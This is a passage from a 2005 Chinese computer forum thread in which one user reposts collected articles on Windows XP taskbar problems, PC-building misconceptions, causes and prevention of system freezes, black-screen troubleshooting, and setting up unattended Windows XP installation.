                  XP的一个bug。遇到这种情况，可以下载一个“Windows XP任务栏假死”的补丁。

                      症状四：任务栏启动项太多

                      点击“开始→运行”，输入msconfig，打开“系统配置实用程序”，在“启动”选项中选中不需要的启动项就可以把它们除去。另外，我们在安装软件的时候，在某个步骤中会出现一些选项，比如“设为任务栏启动项”，我们只要把它前面的钩去掉，它就不会出现在你的任务栏启动项中了。

                  [ 此贴被小强在2005-05-30 08:39重新编辑 ]

                  这个丫头有点懒。。。
                  [楼 主] From:加拿大蒙特利尔 | Posted:2005-05-29 03:54|

            小强

             多看A片不好

            级别: 掌柜
            精华: 5
            发帖: 375
            威望: 397 点
            取之币: 5625 NB
            贡献值: 1 点
            在线时间:172(小时)
            注册时间:2005-05-18
            最后登陆:2005-11-12

                  装机中10大常规性错误by 乱舞春秋

                  不少消费者在装机时往往存在某些概念性错误，这会直接导致投资浪费，或者出现安全隐患。对于初次涉足装机的读者而言，了解一下常见的概念性错误将大有裨益，或许你心中的不少心结也将被解开。

                  DIY装机的稳定性不好

                  在很多用户的心目中，似乎DIY兼容机总是背负着“稳定性不佳”的莫须有罪名。事实上，如今PC的生产已经实现了高度配套化，很多品牌机厂商所做的也仅仅是组装，然后便是严格的稳定性测试。更为重要的是，在制作工艺飞速发展之下，硬件集成度越来越高，PC内部的架构已经远不如以往那样复杂，组装PC的技术含量也大幅度下降。

                  可以负责地说，DIY装机并不等于稳定性不好。只要产品质量过关，组合得当，那么其稳定性完全可以媲美于品牌机。当然，这一前提条件是大家不能忽视的。部分商家为了牟取暴利而千万百计地使用劣质产品，这直接损害了兼容机的形象。从本质上说，“兼容机”这一名称或许并不合适，因为DIY装机并无所谓“兼容”
                  之说。采用与品牌机相同的配件，甚至性能还更上一层楼，此时兼容性与品牌机没有任何区别。更为重要的是，在DIY装机之风日益盛行之后，它反倒体现出一定的兼容性优势，各个配件之间可以很方便地协调工作。反观品牌机，各种独立设计令今后的升级非常不便，最典型的例子莫过于品牌机主板需要特殊挡板以及品牌机需要专用某一品牌的内存等等。

                  AMD处理器功耗太大

                  或许是AMD的市场宣传力度不够，很多消费者一听到AMD就联想起巨大的功耗以及令人不敢恭维的兼容性。然而正如很多资深DIY用户所知道的那样，
                  Athlon XP处理器在功耗方面并不见得比Pentium 4高多少。而在发热量方面，Athlon
                  XP并非如很多用户想象中那样厉害。由于采用了更为先进的铜连接制程，因此Athlon XP的耐高温能力远高于Pentium
                  4，一般工作在60度以下是绝对安全的。

                  在兼容性方面，AMD处理器也完全可以令人放心。CPU兼容性不佳的问题主要出现在Pentium时代。当时Intel为Pentium处理器配备了
                  MMX指令集，而AMD与Cyrix都是通过授权方式得到MMX技术，因此在部分为MMX优化的软件中出现一些兼容性问题。发展到今日，无论是
                  AthlonXP或者Duron，以及即将普及的Athlon64，都不会存在类似问题。

                  5400RPM硬盘更加安全

                  不可否认，硬盘在诸多PC配件中的稳定性是最差的，频繁的故障让很多用户记忆犹新。为此，不少消费者在选购硬盘时都相当谨慎，甚至点名要求5400RPM
                  的低转速产品。在很多人的印象中，5400RPM的低转速硬盘更加安静，发热量也大幅度降低，因此寿命理应更长。然而这一说法并不成立。在7200RPM
                  IDE硬盘诞生之初，Seagate的大灰熊系列确实遇到尴尬，但是就此将所有罪过归结为高转速是不公平的，进而永远对高转速存有偏见更是愚蠢的。

                  如果真正了解现今的IDE硬盘技术的话，一定会对噪音有更加深刻的认识。转速并不是决定噪音大小的关键因素，通过出色的设计，硬盘厂商已经让
                  7200RPM的硬盘变得十分安静，其微小的噪音几乎被CPU风扇完全遮盖。而从稳定性来看，7200RPM技术经过几年的发展之后已经非常成熟，返修率并没有明显高于5400RPM的低转速硬盘。既然72000RPM已经成为市场主流，体现出较大的性能优势，而且与低转速硬盘之间的价格差距微乎其微，我们又有什么理由拒绝呢？

                  电源便宜就好

                  很多消费者对主板、CPU、显卡等配件相当在意，而一提到电源等小配件就会不以为然，认为这类技术含量不高的产品只要能用即可。殊不知，电源对于PC稳定运行有着至关重要的影响。

                  PC系统中各配件使用的都是低压直流电，因此电源就是供电的主角，如果把电流比作血液，那么电源就是计算机的心脏。市电进入电源后，首先经过扼流线圈和电容滤除高频杂波和干扰信号，接下来经过整流和滤波得到高压直流电，然后进入电源的开关电路。开关电路主要负责将直流电转换为高频脉动直流电，再送高频开关变压器降压，然后滤除高频交流部分，这样才得到电脑需要的较为“纯净”的低压直流电。毫无疑问，一旦电源的质量得不到保证，所有的配件都将在不稳定的电压下工作，长此以往将对寿命不利。很多硬盘频繁出现坏道的原因就是电源质量不好，这也是很多用户所忽视的。也正是看到这一问题，国家颁布了强制执行的3C认证，因此建议大家购买那些有保障的3C认证产品！

                  整合主板一定省钱

                  整合主板给很多用户的印象就是省钱，但是这并不是永恒不变的真理。以目前的nForce2
                  IGP以及I865G为例，其性价比并不高，甚至不如直接选择KT333以及I845E，再配上一款Radeon9200SE。整合主板的价值在于节省投资，而那些价格接近千元的产品显然让人难以接受。

                  另一种现象便是超低价格的整合主板，不少商家甚至会准备诸如KM266、SiS730、I815E等过时的主板来“对付”要求低价格的用户。然而当我们真正从性价比角度去分析之后，发现这类整合主板完全不具备优势。或许多投资200元就能买到独立显卡，而此时的性能将完全上一个档次。

                  DDR400内存是不二的选择

                  DDR400是目前最热门的内存规范，然而真正能够使用上其全部威力的用户却不多。PC部件之间讲究协调工作，不然就可能造成投资浪费。以
                  Pentium4平台为例，大多数处理器还停留在533MHz
                  FSB阶段，此时即便是DDR400内存也只能委曲求全地工作在DDR333模式。AMD平台也不例外，当处理器没有达到400MHz
                  FSB时，DDR400只是一种摆设。如果配合nForce2芯片组的话，强行将DDR异步运行于DDR400模式还会降低性能！

                  显然，满足现实需求才是最重要的。如果不准备使用800MHz FSB的Pentium4以及400MHz
                  FSB的Barton，并且也没有超频的打算，那么完全不必跟风般地追求DDR400。

                  超频会影响稳定性

                  超频是DIY装机中永恒的话题，但是不少用户对于超频一直敬而远之，生怕会缩短产品寿命。事实上，出于市场策略的原因，AMD与Intel经常将高频产品当作低端产品来卖，此时进行超频没有任何害处，反而能大幅度提高产品的性价比。

                  真正的超频是建立在安全的基础上，如果能够让CPU稳定工作于合理的温度范围，并且稳定运行所有的应用程序，那么即便超频又何妨呢？

                  CPU与显卡失之偏颇

                  对于3D游戏而言，强大的CPU和显卡都是必不可少的。然而部分消费者由于不了解PC架构，因此片面地追求某一方面，结果导致整体效果不佳，反而不能在
                  3D游戏中获得令人满意的效果。事实上，在3D游戏中，每一个场景的构筑都需要显卡极大的工作量，屏幕上每一个景物都是由显卡根据图形透视原理，通过多个三角形的组合形成的，显卡既要保证近大远小的透视效果，还要根据第一视角的位置实现遮挡效果，这里自然对显卡的性能有着很大的需求。不过，CPU作为整个系统的中枢神经也有极为重要的地位。CPU在3D游戏中所起的作用就是对三维场景进行设计，显卡生成的每一个点都是由CPU规定。此外，CPU还要负责诸如游戏数据处理等工作，负担丝毫不亚于显卡。需要注意的是，如今的显卡GPU已经具备了相当的处理能力，可以有效减轻CPU的负担。然而，从另一个角度来看，CPU又可以模拟GPU的操作，使两者之间形成互补。

                  毫无疑问，片面地强调CPU或者显卡的作用都是错误的，毕竟两者是不可分离的有机体。一般应该保证显卡与CPU的价格差距在600元以内，这样才不会形成明显的性能缺陷。

                  强求名牌产品与多功能产品

                  或许是品牌意识太过强烈，不少消费者在装机时要求清一色的名牌产品，认为这样才能保证产品质量。然而应当指出的是，名牌产品并不意味着高性能，中小品牌产品也不等于低质量！在如今产品同质化严重的时代，各个厂商之间的产品并没有很大的性能差异，甚至经常出现同一款OEM产品的现象，此时甚至谈不上品牌概念。即便是技术含量相对较高的主板，也不会因为品牌差异而造成巨大的性能差距。对于使用同一款芯片组的主板而言，其性能差距都是微乎其微的。当然，这里并非是说名牌产品不好，而且让大家合理地看到品牌优势，用自己的头脑进行性价比分析，做一个理智的消费者。

                  关于产品的功能，也存在着一味求全的现象。对于大部分用户而言，也许如今很多主板的附加功能都是用不上的，如IEEE1394、光纤输出、千兆网卡等，这无异于是投资浪费。将钱花在刀口上，从自己的实际需求出发，这才是DIY装机的精髓。

                  要预留足够的升级空间

                  为了今后升级方便，装机时一定要预留足够的升级空间，甚至宁可多花一点钱，这是很多消费者的普遍心态。诚然，在装机时考虑到这一点并没有错，甚至是应该肯定的。但是如果过分考虑升级空间，你将会因此而得不偿失。

                  目前PC技术正在高速度发展，接口的转变往往在一瞬间完成。以Intel为例，Socket 423刚刚推出，Socket
                  478就将其取代，而今后的Prescott和Dothan处理器甚至已经无法留守Socket
                  478平台。对于用户而言，奢望一款主板多次升级CPU已经是不可能的了。与其为了今后的升级而在选购产品时束手束脚，不如彻底将其抛之脑后！

                  电脑死机原因全集

                  拒绝死机十四招

                  1．保证正确的Bios设置。Bios里面的设置一定要合适，错误的Bios设置会使你在运行Windows的时候死机。

                      2．经常检查电脑配件接触情况。在板卡接触不良的情况下运行会引起系统死机，因此在更换电脑配件时，一定要使板卡与主机板充分接触。

                      3．定期清洁机箱。灰尘太多会使板卡之间接触不良，引起系统在运行中死机，因此机箱要随时清洁，不要让太多的灰尘积存在机箱中。

                      4．坚持认真查杀病毒。对来历不明的光盘或软盘，不要轻易使用，对邮件中的附件，要先用杀毒软件检查后再打开。

                      5．按正确的操作顺序关机。在应用软件未正常结束运行前，别关闭电源，否则会造成系统文件损坏或丢失，引起在启动或运行中死机。

                      6．避免多任务同时进行。在执行磁盘整理或用杀毒软件检查硬盘期间，不要运行其他软件，否则会造成死机。

                      7．勿过分求新。各种硬件的驱动不一定要随时更新，因为才开发的驱动程序往往里面有bug，会对系统造成损害，引起系统死机，最新的不一定是最好的。

                      8．在卸载软件时，用自带的反安装程序或Windows里面的安装／卸载方式，不要直接删除程序文件夹，因为某些文件可能被其他程序共享，一旦删除这些共享文件，会造成应用软件无法使用而死机。

                      9．设置硬件设备时，最好检查有无保留中断（IRQ），不要让其他设备使用该中断号，以免引起中断冲突，造成系统死机。

                      10．在上网冲浪的时候，不要打开太多的浏览器窗口，否则会导致系统资源不足，引起系统死机。

                      11．如果你的机器内存不是很大，千万不要运行占用内存较大的程序，如Photoshop，否则运行时容易死机。

                      12．对于系统文件或重要的文件，最好使用隐含属性，这样才不至于因错误操作删除这些文件，引起系统死机。

                      13．修改硬盘主引导记录时，最好先保存原来的记录，防止因修改失败而无法恢复原来的引导记录。

                      14．CPU、显卡等配件一般不要超频，若确实需要超，要注意超频后板卡的温度，CPU、显卡等长期在非正常频率和温度下工作轻则自动重启或死机，重者烧毁CPU、显卡、主板。
                  如何有效地减少电脑的死机

                  电脑的死机现象是一个令所有电脑爱好者都头疼不已的问题。

                      对于电脑频繁的蓝屏，频繁的死机，一次又一次的重新启动真是令人感到无比厌烦。况且，对电脑进行频繁的重启所带来的硬件的损耗比正常运行时要大好几倍，这无疑大大增加了硬件损坏的几率。

                      但是采用Windows 9X操作系统的电脑，死机却是一件无法避免的事情，究其原因是由于Windows
                  9X操作系统自身核心不稳定造成的。

                      虽然死机是不可避免的，但是笔者在长期与死机的艰苦斗争中，还是总结出一些可以有效地减少电脑死机的方法，不敢独享，特写出来奉献给各位读者，希望大家的电脑都能减少一些死机，多一些稳定。

                      产生死机的原因很多，但总的来说不外乎两大类：硬件原因和软件原因。下面我就分开来给大家具体地讲一讲。

                  硬件篇

                      1.现在的CPU和显示卡由于采用了新工艺，所以都具有不错的超频性能，但超频极易引起系统的不稳定甚至死机（损坏硬件暂且不论）。对于由超频引起的死机现象，应当及时予以降频，或恢复其额定工作频率，以保证电脑稳定工作。

                      2.在更换电脑配件时，安装完毕后，一定要再仔细检查一遍，看硬件是否已经插好，以防止接触不良引起死机。

                      3.有时由于各个硬件之间的冲突而引起死机，这时要试试为板卡刷新新版的BIOS，更新驱动程序或是更改系统中的设备的中断号，实在不行的话，请更换硬件。

                      4.主板的BIOS一定要设定得当，虽然现在许多报纸、杂志和网站都教大家如何将BIOS设置为最优，但殊不知最优的设定却不一定是最稳定的。若由于BIOS设置不当引起死机，应立即将BIOS恢复到出厂时的缺省设置。

                      5.电脑主机一定要配备高质量高性能的电源，因为现在的电脑配件耗电量都较大，特别是超频使用时，耗电量会倍增，若此时电源功率不足，硬件便会出现供电不足的情况，从而引起死机。

                      6.在内存较小的情况下（小于128M），最好不要运行占用内存较多的软件和游戏或是同时运行多个程序，这样会导致物理内存不足，从而引起死机。

                      7.在升级主板或是显示卡的BIOS之前，一定要先确定所要升级的BIOS的版本号是否与板卡的型号相符，同时强烈建议备份原来的版本，以防万一。

                      8.空气中蕴藏着大量的灰尘，久而久之机箱中便会积攒大量的灰尘，这时应当及时清理，否则严重影响散热效果，且灰尘接触板卡电路时会引起短路，从而引起死机。

                      9.“严密监视”各个配件的温度，特别是盛夏来临之时，天气炎热，此时若配件温度过高便会引起死机。

                  软件篇

                      1.对于来历不明的软件、光盘或是盗版软件，一定不要轻易使用，以免传染电脑病毒，引起死机。

                      2.一定要对电脑进行正常的关机，绝对不能直接关闭电源，否则容易造成系统文件丢失或是损坏，引起死机。

                      3.在删除软件时，不要将软件所在的目录直接删除，这样的话会在硬盘和注册表中残留大量的垃圾，久而久之会越集越多，导致系统负担加重，最后系统会不堪重负而死机。正确的方法是，采用软件自带的卸载程序对软件进行删除。

                      4.在电脑常时间运行后或是系统资源低下的情况下，如果要运行大型软件，一定要先将电脑重新启动，否则会因为系统资源不足而引起死机。

                      5.最好少用软件或是硬件驱动的测试版本，因为测试版本中存在着大量的BUG和不稳定因素，易导致死机。

                      6.对于系统文件最好使用隐藏属性，这样才不会因为误删系统文件而导致死机。

                      7.上网时，一次不要打开过多的网页，以免系统负担过重，从而导致死机。再有，千万不要打开一些不大清楚的网页，因为其中可能含有一些恶意代码，对系统进行修改，从而导致死机。
                  全面深入了解电脑死机的原因

                  死机是令操作者颇为烦恼的事情。死机时的表现多为“蓝屏”，无法启动系统，画面“定格”无反应，鼠标、键盘无法输入，软件运行非正常中断等。尽管造成死机的原因是多方面的，但是万变不离其宗，其原因永远也脱离不了硬件与软件两方面。

                  由硬件原因引起的死机

                  【散热不良】显示器、电源和CPU在工作中发热量非常大，因此保持良好的通风状况非常重要，如果显示器过热将会导致色彩、图象失真甚至缩短显示器寿命。工作时间太长也会导致电源或显示器散热不畅而造成电脑死机。CPU的散热是关系到电脑运行的稳定性的重要问题，也是散热故障发生的“重灾区”。【移动不当】在电脑移动过程中受到很大振动常常会使机器内部器件松动，从而导致接触不良，引起电脑死机，所以移动电脑时应当避免剧烈振动。

                  【灰尘杀手】机器内灰尘过多也会引起死机故障。如软驱磁头或光驱激光头沾染过多灰尘后，会导致读写错误，严重的会引起电脑死机。

                  【设备不匹配】如主板主频和CPU主频不匹配，老主板超频时将外频定得太高，可能就不能保证运行的稳定性，因而导致频繁死机。

                  【软硬件不兼容】三维软件和一些特殊软件，可能在有的微机上就不能正常启动甚至安装，其中可能就有软硬件兼容方面的问题。

                  【内存条故障】主要是内存条松动、虚焊或内存芯片本身质量所致。应根据具体情况排除内存条接触故障，如果是内存条质量存在问题，则需更换内存才能解决问题。

                  【硬盘故障】主要是硬盘老化或由于使用不当造成坏道、坏扇区。这样机器在运行时就很容易发生死机。可以用专用工具软件来进行排障处理，如损坏严重则只能更换硬盘了。另外对于在不支持UDMA66/100的主板，应注意CMOS中硬盘运行方式的设定。

                  【CPU
                  超频】超频提高了CPU的工作频率，同时，也可能使其性能变得不稳定。究其原因，CPU在内存中存取数据的速度本来就快于内存与硬盘交换数据的速度，超频使这种矛盾更加突出，加剧了在内存或虚拟内存中找不到所需数据的情况，这样就会出现“异常错误”。解决办法当然也比较简单，就是让CPU回到正常的频率上。【硬件资源冲突】是由于声卡或显示卡的设置冲突，引起异常错误。此外，其它设备的中断、DMA或端口出现冲突的话，可能导致少数驱动程序产生异常，以致死机。解决的办法是以“安全模式”启动，在“控制面板”→“系统”→“设备管理”中进行适当调整。对于在驱动程序中产生异常错误的情况，可以修改注册表。选择“运行”，键入“REGEDIT”，进入注册表编辑器，通过选单下的“查找”功能，找到并删除与驱动程序前缀字符串相关的所有“主键”和“键值”，重新启动。

                  【内存容量不够】内存容量越大越好，应不小于硬盘容量的0.5～1%，如出现这方面的问题，就应该换上容量尽可能大的内存条。

                  【劣质零部件】少数不法商人在给顾客组装兼容机时，使用质量低劣的板卡、内存，有的甚至出售冒牌主板和Remark过的CPU、内存，这样的机器在运行时很不稳定，发生死机在所难免。因此，用户购机时应该警惕，并可以用一些较新的工具软件测试电脑，长时间连续考机（如72小时），以及争取尽量长的保修时间等。

                  由软件原因引起的死机
                  【病毒感染】病毒可以使计算机工作效率急剧下降，造成频繁死机。这时，我们需用杀毒软件如KV300、金山毒霸、瑞星等来进行全面查毒、杀毒，并做到定时升级杀毒软件。

                  【CMOS设置不当】该故障现象很普遍，如硬盘参数设置、模式设置、内存参数设置不当从而导致计算机无法启动。如将无ECC功能的内存设置为具有ECC功能，这样就会因内存错误而造成死机。

                  【系统文件的误删除】由于Windows9x启动需要有Command.com、Io.sys、Msdos.sys等文件，如果这些文件遭破坏或被误删除，即使在CMOS中各种硬件设置正确无误也无济于事。解决方法：使用同版本操作系统的启动盘启动计算机，然后键入“SYSC：”，重新传送系统文件即可。

                  【初始化文件遭破坏】由于Windows9x启动需要读取System.ini、Win.ini和注册表文件，如果存在Config.sys、
                  Autoexec.bat文件，这两个文件也会被读取。只要这些文件中存在错误信息都可能出现死机，特别是System.ini、Win.ini、
                  User.dat、System.dat这四个文件尤为重要。

                  【动态链接库文件（DLL）丢失】在Windows操作系统中还有一类文件也相当重要，这就是扩展名为DLL的动态链接库文件，这些文件从性质上来讲是属于共享类文件，也就是说，一个DLL文件可能会有多个软件在运行时需要调用它。如果我们在删除一个应用软件的时候，该软件的反安装程序会记录它曾经安装过的文件并准备将其逐一删去，这时候就容易出现被删掉的动态链接库文件同时还会被其它软件用到的情形，如果丢失的链接库文件是比较重要的核心链接文件的话，那么系统就会死机，甚至崩溃。我们可用工具软件如“超级兔仔”对无用的
                  DLL文件进行删除，这样会避免误删除。

                  【硬盘剩余空间太少或碎片太多】如果硬盘的剩余空间太少，由于一些应用程序运行需要大量的内存、这样就需要虚拟内存，而虚拟内存则是由硬盘提供的，因此硬盘要有足够的剩余空间以满足虚拟内存的需求。同时用户还要养成定期整理硬盘、清除硬盘中垃圾文件的良好习惯。
                  【BIOS
                  升级失败】应备份BIOS以防不测，但如果你的系统需要对BIOS进行升级的话，那么在升级之前最好确定你所使用BIOS版本是否与你的PC相符合。如果
                  BIOS升级不正确或者在升级的过程中出现意外断电，那么你的系统可能无法启动。所以在升级BIOS前千万要搞清楚BIOS的型号。如果你所使用的
                  BIOS升级工具可以对当前BIOS进行备份，那么请把以前的BIOS在磁盘中拷贝一份。同时看系统是否支持BIOS恢复并且还要懂得如何恢复。

                  【软件升级不当】大多数人可能认为软件升级是不会有问题的，事实上，在升级过程中都会对其中共享的一些组件也进行升级，但是其它程序可能不支持升级后的组件从而导致各种问题。

                  【滥用测试版软件】最好少用软件的测试版，因为测试软件通常带有一些BUG或者在某方面不够稳定，使用后会出现数据丢失的程序错误、死机或者是系统无法启动。

                  【非法卸载软件】不要把软件安装所在的目录直接删掉，如果直接删掉的话，注册表以及Windows目录中会有很多垃圾存在，久而久之，系统也会变不稳定而引起死机。

                  【使用盗版软件】因为这些软件可能隐藏着病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

                  【应用软件的缺陷】这种情况是常见的，如在Win98中运行那些在DOS或Windows3．1中运行良好的16位应用软件。Win98是32位的，尽管它号称兼容，但是有许多地方是无法与16位应用程序协调的。还有一些情况，如在Win95下正常使用的外设驱动程序，当操作系统升级后，可能会出现问题，使系统死机或不能正常启动。遇到这种情况应该找到外设的新版驱动。

                  【启动的程序太多】这使系统资源消耗殆尽，使个别程序需要的数据在内存或虚拟内存中找不到，也会出现异常错误。
                  【非法操作】用非法格式或参数非法打开或释放有关程序，也会导致电脑死机。请注意要牢记正确格式和相关参数，不随意打开和释放不熟悉的程序。

                  【非正常关闭计算机】不要直接使用机箱中的电源按钮，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows98/2000/NT等系统来说，这点非常重要，严重的话，会引起系统崩溃。

                  【内存中冲突】有时候运行各种软件都正常，但是却忽然间莫名其妙地死机，重新启动后运行这些应用程序又十分正常，这是一种假死机现象。出现的原因多是
                  Win98的内存资源冲突。大家知道，应用软件是在内存中运行的，而关闭应用软件后即可释放内存空间。但是有些应用软件由于设计的原因，即使在关闭后也无法彻底释放内存的，当下一软件需要使用这一块内存地址时，就会出现冲突。

                  开机黑屏的一般解决方法

                  一、检查电力供电，电脑电源，电源接口

                  1、检查机箱电源的接口和电源线是否完好，如果借口和电源线有破损、断裂的应当及时更换。
                  2、检查主板电源线插口，如果没有破损就将插口拔出再插入，按下电源开关时，轻轻搬动电源线看是否有反应来判断是否是因为电源线接触不良或焊点松脱导致电源没有接通。
                  3、采用替换法，将这台电源换到其他的机器上试试，同样也可以用一个好的电源接到机器上看是否能启动以判断电源的好坏。特别注意检查电源上的开关是否接通，有些电源是带有开关的。

                  二、采用最小系统法
                  1、将主板取下来，先用毛刷（质量要好，绝不能脱毛，笔者曾经遇到因为毛刷脱掉的毛掉入显卡插槽引起显卡不工作而黑屏的人为故障）进行清洁，不过最好用吹风的冷风档吹一吹，用皮老虎也行，这样清洁后，很多因为灰尘而引起的故障自然而然就得到解决！
                  2、将CPU，内存条，显卡插上，看机器是否点亮。同时可以采用替换法，将好的CPU、内存条和显卡插上测试，以判断故障所在。这时对于一些有关CPU的跳线（硬跳线）要特别注意是否设置正确。特别是在升级CPU的情况下，要先看看主板是否支持新CPU。以免将电压设置过高将CPU烧坏。
                  3、如果在最小系统下，机器仍然不亮，而又确定了CPU（跳线设置也正确）、显卡、内存条都完好的情况下，就应该怀疑主板的问题了。
                  电脑死机的14种情况判断码

                  每一个使用电脑的人都或多或少遇到过死机的问题，下列是常见的死机情况，以供大家参考：
                  ◆情况1：板、卡接触不良、松动，或者板上的插槽坏了，或者干脆显示卡、内存等配件是坏的，导致显示器不亮。
                  ◆情况2：电压起伏太大，造成板、卡上电流或大或小，有时会损坏硬件。所以选择一款能够起到超电压保护的电源是至关重要，或者加稳压器。
                  ◆情况3：打印机、刻录机、扫描仪等外设已坏，但即插即用的技术使系统在启动时检测这些设备导致死机。
                  ◆情况4：超频超过火了，有时显示器不亮，有时是进入系统后死机，严重者会导致CPU被烧坏。
                  ◆情况5：如果主机运行正常，也有硬盘运行的声音，但显示器不亮，可能是显示器坏了，或者是显示器信号线接触不
                  好或是坏的，也有可能是显示器电源未插。
                  ◆情况6：开机只听见“嘀、嘀”的单声长声，估计是内存的问题，换个插槽试试，仍不行的话，可能是内存坏了。
                  ◆情况7：indows95、98系统需要把硬盘一部分作为虚拟内存，硬盘剩余空间太小，也会导致死机。
                  ◆情况8：病毒导致死机。
                  ◆情况9：软件的Bug导致死机。
                  ◆情况10：运行软件互相冲突，如16位与32位软件同时运行可能造成死机。
                  ◆情况11：网上时，黑客侵入。
                  ◆情况12：系统System等子目录中链文件.Dll丢失，造成Windows系统瘫痪。
                  ◆情况13：错误修改了系统注册表信息，造成Windows系统不能启动。
                  ◆情况14：机器运行速度太慢，造成死机的假象。
                  防止电脑死机二十五招

                  1、在同一个硬盘上安装太多的操作系统会引起系统死机。

                  2、CPU、显示卡等配件不要超频过高，要注意温度，否则，在启动或运行时会莫名其妙地重启或死机。

                  3、在更换电脑配件时，一定要插好，因为配件接触不良会引起系统死机。

                  4、BIOS设置要恰当，虽然建议将BIOS设置为最优，但所谓最优并不是最好的，有时最优的设置反倒会引起启动或者运行死机。

                  5、最好配备稳压电源，以免电压不稳引起死机。

                  6、如果有条件的话，加装一个UPS，使电脑在停电后不会造成死机。

                  7、对来历不明的软盘和光盘，不要轻易使用，对E－mail中所附的软件，要用KV300、瑞星等杀毒软件检查后再使用，以免传染病毒后，是系统死机。

                  8、在应用软件未正常结束时，别关闭电源，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows98/2000/NT等系统来说，这点非常重要。

                  9、在安装应用软件当中，若出现提示对话框“是否覆盖文件”，最好选择不要覆盖。因为通常当前系统文件是最好的，不能根据时间的先后来决定覆盖文件(除非你对文件的时间很在意)。

                  10、在卸载软件时，不要删除共享文件，因为某些共享文件可能被系统或者其他程序使用，一旦删除这些文件，会使应用软件无法启动而死机，或者出现系统运行死机。

                  11、设置硬件设备时，最好检查有无保留中断号(IRQ)，不要让其他设备使用该中断号，否则引起IRQ冲突，从而引起系统死机。

                  12、在加载某些软件时，要注意先后次序，由于有些软件编程不规范，在运行是不能排在第一，而要放在最后运行，这样才不会引起系统管理的混乱。

                  13、在运行大型应用软件时(如OFFICE
                  2000)，不要在运行状态下退出以前运行的程序，否则会引起整个Windows98系统的崩溃。

                  14、在内存较小的情况下(如4MB－16MB)，最好不要运行占用内存较大的应用程序，否则在运行时容易出现死机。建议在运行这些程序时应及时保存当前正在使用的文件。

                  15、对于系统文件或重要文件，最好使用隐含属性，这样才不致于因误操作而删除或者覆盖这些文件。

                  16、修改硬盘主引导记录时，最好先保存原来的记录，防止因修改失败而无法恢复原来的硬盘主引导记录。

                  17、最好少用软件的测试版，因为测试版在某方面不够稳定，在使用后会使系统无法启动。

                  18、在Windows95/98中尽量不要运行16位应用程序，因为16位的应用程序会与Windows中的32位应用程序产生冲突，从而引起死机或无法启动。

                  19、在升级BIOS之前，应确定所升级的BIOS版本，同时应先保存一下原先的版本，以免升级错误而使系统无法启动。

                  20、尽量不要使用盗版的软件，因为这些软件里隐藏着大量病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

                  21、在机箱中，可能蕴藏了大量的灰尘，灰尘若接触了配件的电路，会使系统不稳定或死机。

                  22、在执行磁盘碎片整理的时后，不要运行大型应用软件，否则引起死机。

                  23、用杀毒软件检查硬盘期间，不要运行其它的应用程序，以防止系统死机。

                  24、在上网的时候，不要一次打开太多的浏览窗口，导致资源不足，引起死机。

                  25、在关闭计算机的时候，不要直接使用机箱中的电源按钮，因为直接使用电源按钮会引起文件的丢失，使下次不能正常启动，从而造成系统死机

                  做爱做的事
                    ●～　　●～　　　●～　　　　●～　　　●～ ……
                  ○　 ●～　 ●～　 ●～
                       ●～　●～　●～　　　●～　　……
                  [1 楼] From:山东省潍坊市 | Posted:2005-05-30 08:25|

            小强

             多看A片不好

            级别: 掌柜
            精华: 5
            发帖: 375
            威望: 397 点
            取之币: 5625 NB
            贡献值: 1 点
            在线时间:172(小时)
            注册时间:2005-05-18
            最后登陆:2005-11-12

                  快速重装Windows系统-

                  无论菜鸟还是老鸟，用上电脑后，自己新装或者重装所需的操作系统是避免不了要做的事情。虽然安装操作系统的过程不算太复杂，但也的确是一件劳神费力的辛苦事。

                      一、复杂方法

                      1.重装系统的主要步骤

                      首先要调整系统引导顺序。一般是在开机的时候，按下DEL键，进入BIOS设置界面，将系统引导顺序中的设置更改为“CD-ROM”（光驱优先启动）。

                      然后，对硬盘进行重新格式化。为了让新安装的操作系统拥有“绝对纯净”的环境，很多人都习惯在重装前对系统分区重新进行格式化，以消除原有系统可能造成的影响。

                      须要注意的是，如果原先在硬盘的某个分区中安装了其他操作系统，那么新的操作系统就不要再安装在同一个分区了，这样有利于在多系统并存情况下加强各个系统的稳定性。

                      接下来安装新的操作系统。用Windows安装光盘引导系统，然后按照安装向导的提示一步步进行操作。这个过程最是漫长，而且电脑每过一段时间就会冒个问题出来，比如“你准备把系统装到哪里”、“你的序列号是什么”、“你这台电脑叫什么名字”……如果你不及时回答，它就会把整个安装过程停下来等你，十分烦人。

                      最后还要安装各种驱动程序。大多数情况下，虽然系统会预置一些基本的驱动程序，但为了更好地发挥硬件效能，我们还是应该手工安装一些更合适的驱动程序。

                      如果经常上网，那么安装最新的补丁程序或补丁包也是一个必要的步骤。联上互联网，可以去微软公司的更新站点下载关键更新和Service
                  Pack、Windows
                  XP、驱动程序更新等不同类别的更新程序，而且为了省事，我们可以下载和安装打包了的补丁包，省去逐个查找、逐个安装的麻烦。更新后，可以提供系统的安全性、稳定性，同时也提供了一些更好的新功能。

                      2.使用安装脚本

                      一般来说，顺利地装完操作系统，须要花费1～2个小时的时间，如果系统配置稍低档一些，所需要的时间就更长了。

                      前面已经提到，在安装过程中，虽然大部分的操作由安装程序自动进行，但是仍然有很多步骤须要用户选择有关的选项或者输入一些信息（序列号、区域和语言、计算机名称、管理员密码、日期和时间设定、网络设置等）后，安装才能进行下去。这样一来，我们就只好守在计算机前，随时等待回答电脑提出的问题。很多人
                  “重装系统好累”，其实就“累”在这里。

                      于是，一些高手便找到了偷懒的办法。他们将一些固定的选择操作和设置信息保存为一个脚本文件，把准备回答电脑的答案全都放在里面。这样，当安装程序想要提问时，就能直接在脚本里找到答案，实现无人参与的全自动安装，而高手们则可以舒舒服服地离开电脑去做其他的事了。下面，我们就以目前主流的Windows
                  XP为例，介绍如何为Windows XP创建安装脚本，实现无人参与的全自动安装方法。

                      在Windows
                  XP安装光盘的“SUPPORT\TOOLS”目录中有一个“DEPLOY.CAB”文件，用WinRAR解压缩软件打开该文件，解压出其中的setupmgr.exe程序，它就是传说的“Windows
                  安装管理器”。

                      双击setupmgr.exe程序，启动Windows安装管理器，同时弹出的还有“Windows
                  安装管理器向导”对话框，通过该向导，我们可以创建所需的安装脚本。

                      要创建无人参与的安装脚本，就要先在“Windows
                  安装管理器向导”的“用户相互作用级别”对话框中选择“全部自动”。这样安装程序将不提示用户做出任何回答，有关的回答信息都设定在脚本文件中。此外，在通常情况下，我们都是利用Windows
                  XP的安装光盘来安装Windows，所以要在“分发文件夹”对话框中选择“否，这个应答文件将用来从CD安装”。

